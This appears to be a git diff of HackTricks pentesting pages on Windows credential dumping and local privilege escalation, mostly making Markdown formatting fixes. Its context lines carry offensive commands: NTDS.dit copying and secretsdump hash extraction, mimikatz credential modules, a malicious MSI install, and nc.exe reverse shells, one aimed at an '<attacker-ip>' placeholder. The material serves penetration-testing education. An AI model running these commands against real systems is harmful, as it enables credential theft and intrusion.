+**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
 
 ### Copying NTDS.dit using Ntdsutil
 
@@ -220,11 +220,11 @@ Available since Windows Server 2008.
 ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
 ```
 
-You could also use the [**volume shadow copy**](./#stealing-sam-and-system)** **trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system)** **trick).
+You could also use the [**volume shadow copy**](./#stealing-sam-and-system) **** trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) **** trick).
 
 ### **Extracting hashes from NTDS.dit**
 
-Once you have **obtained **the files **NTDS.dit** and **SYSTEM **you can use tools like_ secretsdump.py_ to **extract the hashes**:
+Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
 
 ```bash
 secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
@@ -236,9 +236,9 @@ You can also **extract them automatically** using a valid domain admin user:
 secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
 ```
 
-For** big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump).
+For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump).
 
-Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain_hashdump _or **mimikatz **`lsadump::lsa /inject` 
+Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject`&#x20;
 
 ## Lazagne
 
diff --git a/windows/stealing-credentials/credentials-mimikatz.md b/windows/stealing-credentials/credentials-mimikatz.md
index a55545b1..e105d069 100644
--- a/windows/stealing-credentials/credentials-mimikatz.md
+++ b/windows/stealing-credentials/credentials-mimikatz.md
@@ -210,7 +210,7 @@ NetSync provides a simple way to use a DC computer account password data to impe
 
 **LSADUMP::Secrets** – get the SysKey to decrypt SECRETS entries (from registry or hives).
 
-**LSADUMP::SetNTLM **– Ask a server to set a new password/ntlm for one user.
+**LSADUMP::SetNTLM** – Ask a server to set a new password/ntlm for one user.
 
 [**LSADUMP::Trust**](https://adsecurity.org/?p=1588) – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
 
@@ -280,11 +280,11 @@ Command:  _mimikatz sekurlsa::tickets exit_
 
 The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.
 
-**SID::add **– Add a SID to SIDHistory of an object
+**SID::add** – Add a SID to SIDHistory of an object
 
 [![Mimikatz-SID-add](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)
 
-**SID::modify **– Modify object SID of an object
+**SID::modify** – Modify object SID of an object
 
 [![Mimikatz-SID-Modify](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-Modify.png)
 
@@ -309,7 +309,7 @@ Find a domain admin credential on the box and use that token: _token::elevate /d
 
 [![Mimikatz-TS-MultiRDP](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-TS-MultiRDP.png)
 
-**TS::Sessions **– List TS/RDP sessions.
+**TS::Sessions** – List TS/RDP sessions.
 
 ![](https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-TS-Sessions.png)
 
diff --git a/windows/stealing-credentials/credentials-protections.md b/windows/stealing-credentials/credentials-protections.md
index 977ea509..6fb72e8a 100644
--- a/windows/stealing-credentials/credentials-protections.md
+++ b/windows/stealing-credentials/credentials-protections.md
@@ -2,14 +2,14 @@
 
 ## WDigest
 
-[WDigest](https://technet.microsoft.com/pt-pt/library/cc778868\(v=ws.10\).aspx?f=255\&MSPPError=-2147217396) protocol was introduced in Windows XP and was designed to be used with HTTP Protocol for authentication. Microsoft has this protocol **enabled by default in multiple versions of Windows** (Windows XP — Windows 8.0 and Windows Server 2003 — Windows Server 2012) which means that **plain-text passwords are stored in the LSASS** (Local Security Authority Subsystem Service). **Mimikatz **can interact with the LSASS allowing an attacker to** retrieve these credentials** through the following command:
+[WDigest](https://technet.microsoft.com/pt-pt/library/cc778868\(v=ws.10\).aspx?f=255\&MSPPError=-2147217396) protocol was introduced in Windows XP and was designed to be used with HTTP Protocol for authentication. Microsoft has this protocol **enabled by default in multiple versions of Windows** (Windows XP — Windows 8.0 and Windows Server 2003 — Windows Server 2012) which means that **plain-text passwords are stored in the LSASS** (Local Security Authority Subsystem Service). **Mimikatz** can interact with the LSASS allowing an attacker to **retrieve these credentials** through the following command:
 
 ```
 sekurlsa::wdigest
 ```
 
-This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential **_and _**Negotiate  **_in_** HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.\
-If these registry keys** don't exist **or the value is **"0"**, then WDigest will be **deactivated**.
+This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential**_ and _**Negotiate**_  in _**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.\
+If these registry keys **don't exist** or the value is **"0"**, then WDigest will be **deactivated**.
 
 ```
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
@@ -17,8 +17,8 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Use
 
 ## LSA Protection
 
-Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent **untrusted processes from being able to **read its memory **or to inject code. This will prevent regular `mimikatz.exe sekurlsa:logonpasswords` for working properly.\
-To **activate this protection** you need to set the value _**RunAsPPL **_in _**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ to 1.
+Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent** untrusted processes from being able to **read its memory** or to inject code. This will prevent regular `mimikatz.exe sekurlsa:logonpasswords` for working properly.\
+To **activate this protection** you need to set the value _**RunAsPPL**_ in _**HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ to 1.
 
 ```
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
@@ -32,14 +32,14 @@ It is possible to bypass this protection using Mimikatz driver mimidrv.sys:
 
 ## Credential Guard
 
-**Credential Guard** is a new feature in Windows 10 (Enterprise and Education edition) that helps to protect your credentials on a machine from threats such as pass the hash. This works through a technology called Virtual Secure Mode (VSM) which utilizes virtualization extensions of the CPU (but is not an actual virtual machine) to provide **protection to areas of memory** (you may hear this referred to as Virtualization Based Security or VBS). VSM creates a separate "bubble" for key **processes **that are **isolated **from the regular** operating system** processes, even the kernel and** only specific trusted processes may communicate to the processes** (known as **trustlets**) in VSM. This means a process in the main OS cannot read the memory from VSM, even kernel processes. The** Local Security Authority (LSA) is one of the trustlets** in VSM in addition to the standard **LSASS** process that still runs in the main OS to ensure support with existing processes but is really just acting as a proxy or stub to communicate with the version in VSM ensuring actual credentials run on the version in VSM and are therefore protected from attack. Credential Guard must be turned on and deployed in your organization as it is **not enabled by default.**\
+**Credential Guard** is a new feature in Windows 10 (Enterprise and Education edition) that helps to protect your credentials on a machine from threats such as pass the hash. This works through a technology called Virtual Secure Mode (VSM) which utilizes virtualization extensions of the CPU (but is not an actual virtual machine) to provide **protection to areas of memory** (you may hear this referred to as Virtualization Based Security or VBS). VSM creates a separate "bubble" for key **processes** that are **isolated** from the regular **operating system** processes, even the kernel and **only specific trusted processes may communicate to the processes** (known as **trustlets**) in VSM. This means a process in the main OS cannot read the memory from VSM, even kernel processes. The **Local Security Authority (LSA) is one of the trustlets** in VSM in addition to the standard **LSASS** process that still runs in the main OS to ensure support with existing processes but is really just acting as a proxy or stub to communicate with the version in VSM ensuring actual credentials run on the version in VSM and are therefore protected from attack. Credential Guard must be turned on and deployed in your organization as it is **not enabled by default.**\
 From [https://www.itprotoday.com/windows-10/what-credential-guard](https://www.itprotoday.com/windows-10/what-credential-guard)\
 More information and a PS1 script to enable Credential Guard [can be found here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
 
-In this case **Mimikatz cannot do much to bypass** this and extract the hashes from LSASS. But you could always add your** custom SSP **and** capture the credentials **when a user tries to login in** clear-text**.\
-More information about** **[**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
+In this case **Mimikatz cannot do much to bypass** this and extract the hashes from LSASS. But you could always add your **custom SSP** and **capture the credentials** when a user tries to login in **clear-text**.\
+More information about **** [**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
 
-Credentials Guard could be **enable in different ways**. To check if it was enabled using the registry you could check the value of the key _**LsaCfgFlags **_in _**HKLM\System\CurrentControlSet\Control\LSA**_. If the value is** "1" **the it is active with UEFI lock, if **"2"** is active without lock and if** "0"** it's not enabled.\
+Credentials Guard could be **enable in different ways**. To check if it was enabled using the registry you could check the value of the key _**LsaCfgFlags**_ in _**HKLM\System\CurrentControlSet\Control\LSA**_. If the value is **"1"** the it is active with UEFI lock, if **"2"** is active without lock and if **"0"** it's not enabled.\
 This is **not enough to enable Credentials Guard** (but it's a strong indicator).\
 More information and a PS1 script to enable Credential Guard [can be found here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
 
@@ -63,15 +63,15 @@ From [here](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).
 
 ## Cached Credentials
 
-**Domain credentials** are used by operating system components and are **authenticated **by the **Local** **Security Authority **(LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data. This registered security package may be the **Kerberos** protocol or **NTLM**.
+**Domain credentials** are used by operating system components and are **authenticated** by the **Local** **Security Authority** (LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data. This registered security package may be the **Kerberos** protocol or **NTLM**.
 
-**Windows stores the last ten domain login credentials in the event that the domain controller goes offline**. If the domain controller goes offline, a user will** still be able to log into their computer**. This feature is mainly for laptop users that do not regularly log into their company’s domain. The number of credentials that the computer stores can be controlled by the following **registry key, or via group policy**:
+**Windows stores the last ten domain login credentials in the event that the domain controller goes offline**. If the domain controller goes offline, a user will **still be able to log into their computer**. This feature is mainly for laptop users that do not regularly log into their company’s domain. The number of credentials that the computer stores can be controlled by the following **registry key, or via group policy**:
 
 ```bash
 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
 ```
 
-The credentials are hidden from normal users, even administrator accounts. The **SYSTEM** user is the only user that has **privileges **to **view **these **credentials**. In order for an administrator to view these credentials in the registry they must access the registry as a SYSTEM user.\
+The credentials are hidden from normal users, even administrator accounts. The **SYSTEM** user is the only user that has **privileges** to **view** these **credentials**. In order for an administrator to view these credentials in the registry they must access the registry as a SYSTEM user.\
 The Cached credentials are stored in the registry at the following registry location:
 
 ```
@@ -87,11 +87,11 @@ When the signed in user is a member of the Protected Users group the following p
 
 * Credential delegation (CredSSP) will not cache the user's plain text credentials even when the **Allow delegating default credentials** Group Policy setting is enabled.
 * Beginning with Windows 8.1 and Windows Server 2012 R2, Windows Digest will not cache the user's plain text credentials even when Windows Digest is enabled.
-* **NTLM **will **not cache **the user's** plain text credentials** or NT **one-way function** (NTOWF).
-* **Kerberos **will **no **longer create **DES **or **RC4 keys**. Also it will **not cache the user's plain text** credentials or long-term keys after the initial TGT is acquired.
+* **NTLM** will **not cache** the user's **plain text credentials** or NT **one-way function** (NTOWF).
+* **Kerberos** will **no** longer create **DES** or **RC4 keys**. Also it will **not cache the user's plain text** credentials or long-term keys after the initial TGT is acquired.
 * A **cached verifier is not created at sign-in or unlock**, so offline sign-in is no longer supported.
 
-After the user account is added to the Protected Users group, protection will begin when the user signs in to the device. **From **[**here**](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group)**.**
+After the user account is added to the Protected Users group, protection will begin when the user signs in to the device. **From** [**here**](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group)**.**
 
 | Windows Server 2003 RTM | Windows Server 2003 SP1+ | <p>Windows Server 2012,<br>Windows Server 2008 R2,<br>Windows Server 2008</p> | Windows Server 2016          |
 | ----------------------- | ------------------------ | ----------------------------------------------------------------------------- | ---------------------------- |
@@ -112,4 +112,4 @@ After the user account is added to the Protected Users group, protection will be
 | Schema Admins           | Schema Admins            | Schema Admins                                                                 | Schema Admins                |
 | Server Operators        | Server Operators         | Server Operators                                                              | Server Operators             |
 
-**Table from **[**here**](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)**.**
+**Table from** [**here**](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)**.**
diff --git a/windows/windows-local-privilege-escalation/README.md b/windows/windows-local-privilege-escalation/README.md
index d36ff2f7..7e949d27 100644
--- a/windows/windows-local-privilege-escalation/README.md
+++ b/windows/windows-local-privilege-escalation/README.md
@@ -2,13 +2,13 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
-### **Best tool to look for Windows local privilege escalation vectors: **[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)****
+### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)****
 
 ## Initial Windows Theory
 
@@ -59,10 +59,10 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
 
 #### On the system
 
-* _post/windows/gather/enum_patches_
-* _post/multi/recon/local_exploit_suggester_
+* _post/windows/gather/enum\_patches_
+* _post/multi/recon/local\_exploit\_suggester_
 * [_watson_](https://github.com/rasta-mouse/Watson)
-* [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)_ (Winpeas has watson embedded)_
+* [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_
 
 **Locally with system infromation**
 
@@ -184,7 +184,7 @@ HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
 
 And if `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` is equals to `1`.
 
-Then,** it is exploitable. **If the last registry is equals to 0, then, the WSUS entry will be ignored.
+Then, **it is exploitable.** If the last registry is equals to 0, then, the WSUS entry will be ignored.
 
 In orther to exploit this vulnerabilities you can use tools like: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus)- These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.
 
@@ -195,7 +195,7 @@ Read the research here:
 #### WSUS CVE-2020-1013
 
 ****[**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\
-Basically, this is the flaw that this bug exploits: 
+Basically, this is the flaw that this bug exploits:&#x20;
 
 > If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run [PyWSUS](https://github.com/GoSecure/pywsus) locally to intercept our own traffic and run code as an elevated user on our asset.
 >
@@ -205,7 +205,7 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith
 
 ## AlwaysInstallElevated
 
-**If** these 2 registers are **enabled **(value is** 0x1**), then users of any privilege can **install **(execute)** `*.msi`** files as NT AUTHORITY\\**SYSTEM**.
+**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) ** `*.msi`** files as NT AUTHORITY\\**SYSTEM**.
 
 ```bash
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
@@ -233,7 +233,7 @@ Just execute the created binary to escalate privileges.
 
 ### MSI Wrapper
 
-Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a "**.bat**" file if you **just **want to **execute** **command lines**
+Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a "**.bat**" file if you **just** want to **execute** **command lines**
 
 {% content-ref url="msi-wrapper.md" %}
 [msi-wrapper.md](msi-wrapper.md)
@@ -247,13 +247,13 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t
 
 ### MSI Installation
 
-To execute the **installation **of the **malicious `.msi` **file in **background:**
+To execute the **installation** of the **malicious `.msi` ** file in **background:**
 
 ```
 msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
 ```
 
-To exploit this vulnerability you can use: _exploit/windows/local/always_install_elevated_
+To exploit this vulnerability you can use: _exploit/windows/local/always\_install\_elevated_
 
 ## Antivirus and Detectors
 
@@ -275,17 +275,17 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs
 
 ### LAPS
 
-**LAPS **allows you to** manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES.
+**LAPS** allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES.
 
 ```bash
 reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
 ```
 
-When using LAPS, 2 new attributes appear in the computer objects of the domain: _ms-msc-AdmPwd_ and _ms-mcs-AdmPwdExpirationTime. _These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes...
+When using LAPS, 2 new attributes appear in the computer objects of the domain: _ms-msc-AdmPwd_ and _ms-mcs-AdmPwdExpirationTime._ These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes...
 
 ### WDigest
 
-If active,** plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\
+If active, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\
 [**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest).
 
 ```
@@ -294,7 +294,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Use
 
 ### LSA Protection
 
-Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent **untrusted processes from being able to **read its memory **or to inject code.\
+Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent** untrusted processes from being able to **read its memory** or to inject code.\
 [**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection).
 
 ```
@@ -312,7 +312,7 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 
 ### Cached Credentials
 
-**Domain credentials** are used by operating system components and are **authenticated **by the **Local** **Security Authority **(LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data.\
+**Domain credentials** are used by operating system components and are **authenticated** by the **Local** **Security Authority** (LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data.\
 [**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials).
 
 ```
@@ -350,7 +350,7 @@ C:\windows\tracing
 
 ### UAC
 
-UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default **the **low privileged token **of the user.\
+UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\
 [**More information about UAC here**](../authentication-credentials-uac-and-efs.md#uac).
 
 ```
@@ -388,7 +388,7 @@ If you **belongs to some privileged group you may be able to escalate privileges
 
 ### Token manipulation
 
-**Learn more **about what is a **token **in this page: [**Windows Tokens**](../authentication-credentials-uac-and-efs.md#access-tokens).\
+**Learn more** about what is a **token** in this page: [**Windows Tokens**](../authentication-credentials-uac-and-efs.md#access-tokens).\
 Check the following page to **learn about interesting tokens** and how to abuse them:
 
 {% content-ref url="privilege-escalation-abusing-tokens.md" %}
@@ -426,7 +426,7 @@ powershell -command "Get-Clipboard"
 ### File and Folder Permissions
 
 First of all, listing the processes **check for passwords inside the command line of the process**.\
-Check if you can **overwrite some binary running **or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking.md):
+Check if you can **overwrite some binary running** or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking.md):
 
 ```bash
 Tasklist /SVC #List processes running and services
@@ -511,7 +511,7 @@ accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
 
 ### Enable service
 
-If you are having this error (for example with SSDPSRV): 
+If you are having this error (for example with SSDPSRV):&#x20;
 
 _System error 1058 has occurred._\
 _The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
@@ -525,7 +525,7 @@ sc config SSDPSRV obj= ".\LocalSystem" password= ""
 
 **Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)**
 
-**Another workaround **of this problem is running:
+**Another workaround** of this problem is running:
 
 ```
 sc.exe config usosvc start= auto
@@ -533,7 +533,7 @@ sc.exe config usosvc start= auto
 
 ### **Modify service binary path**
 
-If the group "Authenticated users" has **SERVICE_ALL_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
+If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
 
 ```bash
 sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
@@ -551,17 +551,17 @@ net stop [service name] && net start [service name]
 ```
 
 Other Permissions can be used to escalate privileges:\
-**SERVICE_CHANGE_CONFIG** Can reconfigure the service binary\
-**WRITE_DAC:** Can reconfigure permissions, leading to SERVICE_CHANGE_CONFIG\
-**WRITE_OWNER:** Can become owner, reconfigure permissions\
-**GENERIC_WRITE:** Inherits SERVICE_CHANGE_CONFIG\
-**GENERIC_ALL:** Inherits SERVICE_CHANGE_CONFIG
+**SERVICE\_CHANGE\_CONFIG** Can reconfigure the service binary\
+**WRITE\_DAC:** Can reconfigure permissions, leading to SERVICE\_CHANGE\_CONFIG\
+**WRITE\_OWNER:** Can become owner, reconfigure permissions\
+**GENERIC\_WRITE:** Inherits SERVICE\_CHANGE\_CONFIG\
+**GENERIC\_ALL:** Inherits SERVICE\_CHANGE\_CONFIG
 
-**To detect and exploit** this vulnerability you can use _exploit/windows/local/service_permissions_
+**To detect and exploit** this vulnerability you can use _exploit/windows/local/service\_permissions_
 
 ### Services binaries weak permissions
 
-**Check if you can modify the binary that is executed by a service **or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking.md))**.**\
+**Check if you can modify the binary that is executed by a service** or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking.md))**.**\
 ****You can get every binary that is executed by a service using **wmic** (not in system32) and check your permissions using **icacls**:
 
 ```bash
@@ -602,7 +602,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\srevices\<service_name> /v ImagePath /t RE
 
 ### Services registry AppendData/AddSubdirectory permissions
 
-If you have this permission over a registry this means to** you can create sub registries from this one**. In case of Windows services this is** enough to execute arbitrary code:**
+If you have this permission over a registry this means to **you can create sub registries from this one**. In case of Windows services this is **enough to execute arbitrary code:**
 
 {% content-ref url="appenddata-addsubdirectory-permission-over-service-registry.md" %}
 [appenddata-addsubdirectory-permission-over-service-registry.md](appenddata-addsubdirectory-permission-over-service-registry.md)
@@ -640,7 +640,7 @@ for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
 
-**You can detect and exploit** this vulnerability with metasploit: _exploit/windows/local/trusted_service_path_\
+**You can detect and exploit** this vulnerability with metasploit: _exploit/windows/local/trusted\_service\_path_\
 You can manually create a service binary with metasploit:
 
 ```bash
@@ -655,7 +655,7 @@ It's possible to indicate Windows what it should do[ when executing a service th
 
 ### Installed Applications
 
-Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders **([DLL Hijacking](dll-hijacking.md)).
+Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders** ([DLL Hijacking](dll-hijacking.md)).
 
 ```bash
 dir /a "C:\Program Files"
@@ -698,7 +698,7 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac
 ### Run at startup
 
 **Check if you can overwrite some registry or binary that is going to be executed by a different user.**\
-**Read **the **following page **to learn more about interesting **autoruns locations to escalate privileges**:
+**Read** the **following page** to learn more about interesting **autoruns locations to escalate privileges**:
 
 {% content-ref url="privilege-escalation-with-autorun-binaries.md" %}
 [privilege-escalation-with-autorun-binaries.md](privilege-escalation-with-autorun-binaries.md)
@@ -776,7 +776,7 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
 
 ### Firewall Rules
 
-****[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall)** (list rules, create rules, turn off, turn off...)**
+****[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)**
 
 More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network)
 
@@ -787,7 +787,7 @@ C:\Windows\System32\bash.exe
 C:\Windows\System32\wsl.exe
 ```
 
- Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
+&#x20;Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
 
 If you get root user you can listen on any port (the first time you use `nc.exe` to listen on a port it will ask via GUI if `nc` should be allowed by the firewall).
 
@@ -800,7 +800,7 @@ wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 
 To easily start bash as root, you can try `--default-user root`
 
- You can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
+&#x20;You can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
 
 ## Windows Credentials
 
@@ -849,7 +849,7 @@ Using `runas` with a provided set of credential.
 C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
 ```
 
-Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1).
+Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials\_file\_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault\_password\_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/credentials/dumpCredStore.ps1).
 
 ### DPAPI
 
@@ -857,7 +857,7 @@ In theory, the Data Protection API can enable symmetric encryption of any kind o
 
